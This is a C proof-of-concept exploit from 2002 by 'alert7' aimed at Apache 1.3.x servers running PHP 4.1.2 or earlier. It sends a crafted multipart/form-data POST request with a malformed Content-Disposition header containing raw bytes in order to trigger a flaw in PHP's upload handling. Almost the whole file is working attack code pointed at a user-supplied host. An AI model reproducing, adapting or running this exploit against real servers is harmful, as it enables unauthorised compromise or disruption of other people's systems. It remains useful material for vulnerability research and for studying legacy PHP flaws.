/*

x_php_for_php.4.1.2.c

Author: alert7 < alert7@xfocus.org >
web: http://www.xfocus.net/ http://www.whitecell.org
2002-3-6

[notes]
This  is  a proof  of concept exploit for Apache/1.3.x(or IIS but not tested) + php_4.1.2. and below 4.1.2 

[References]
Gabriel A. Maggiotti http://qb0x.net/exploits/apache_php.c 
*/

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <netdb.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <unistd.h>
#include <fcntl.h>


int main(int argc,char *argv[])
{
	int sockfd;
	char genbuf[4096];

	char HTTP_HEAD[] =
"POST %s HTTP/1.1
Accept-Language: zh-cn
Content-Type: multipart/form-data; boundary=---------------------------7d2155311405aa
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Host: %s
Content-Length: 236
Connection: Keep-Alive
Cache-Control: no-cache

-----------------------------7d2155311405aa
 Content-Disposition: form-data;name=\"\x10\x85\x79\x90\";filename=\"C:\\alert7.txt\"Content-Type: text/plain";

	struct hostent *he;
	struct sockaddr_in their_addr;

	if(argc!=3)
	{
		fprintf(stderr,"usage:%s <hostname> <php_file>\n",argv[0]);
		exit(1);
	}
	
	snprintf(genbuf,4096-1,HTTP_HEAD,argv[2],argv[1]);
	genbuf[4096-1]=0;

	if((he=gethostbyname(argv[1]))==NULL)
	{
		perror("gethostbyname");
		exit(1);
	}


	if( (sockfd=socket(AF_INET,SOCK_STREAM,0)) == -1) {
		perror("socket"); exit(1);
	}

	their_addr.sin_family=AF_INET;
	their_addr.sin_port=htons(80);
	their_addr.sin_addr=*((struct in_addr*)he->h_addr);
	bzero(&(their_addr.sin_zero),8);

	if( connect(sockfd,(struct sockaddr*)&their_addr,\
		 sizeof(struct sockaddr))==-1)
	{
		perror("connect");
		exit(1);
	}

	
	if( send(sockfd,genbuf,strlen(genbuf),0) ==-1)
	{
		perror("send");
		exit(0);
	}

	close(sockfd);

return 0;
}